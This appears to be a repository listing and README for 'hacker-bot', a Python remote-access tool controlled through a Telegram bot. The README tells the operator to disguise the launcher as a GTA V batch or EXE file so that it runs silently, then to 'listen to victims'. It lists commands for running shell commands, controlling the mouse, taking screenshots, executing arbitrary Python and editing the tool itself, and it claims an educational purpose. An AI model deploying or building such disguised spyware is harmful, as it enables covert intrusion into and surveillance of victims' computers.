https://github.com/ynstf/hacker-bot
this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.
https://github.com/ynstf/hacker-bot
bot hacking payload python telegram-bot
Last synced: 2 months ago
JSON representation
this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.
- Host: GitHub
- URL: https://github.com/ynstf/hacker-bot
- Owner: ynstf
- License: cc0-1.0
- Created: 2023-01-26T10:48:10.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2023-01-26T15:27:57.000Z (over 3 years ago)
- Last Synced: 2025-08-03T22:08:52.912Z (11 months ago)
- Topics: bot, hacking, payload, python, telegram-bot
- Language: Python
- Homepage:
- Size: 497 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# hacker-bot
this script allow to any user to acces your files, controle your mouse, take pictures from your screen, run other script and even change it self.
by clicking on the bat file it will show the GTA V logo and run the script silently in the background.
you can convert this gta v.BAT to an EXE file and change its shortcut's icon.
after the script is run you can listen to victims in the telegram chat bot, who you put its token in main.py.
the goal of this repository is to education and protection!.

# menu
*******************************
to test :
hi --> this script is raning by the victim
*******************************
to write a windows command :
$ ipconfig
$ time --> time : 16:11:00,73
$ ping 192.168.1.1
*******************************
to control the mouse :
mouse x y --> mouse 90 90
*******************************
click --> to click
*******************************
screen --> to take screen
*******************************
to show myself :
show --> (script)
*******************************
to edit me :
edit (script) --> DONE!
*******************************
to run python code :
rc with open("hack.txt", "a+") as f:
f.write("hacked!")
f.close
*******************************
to close :
-exit
-$ taskkill /f /im pythonw.exe
*******************************
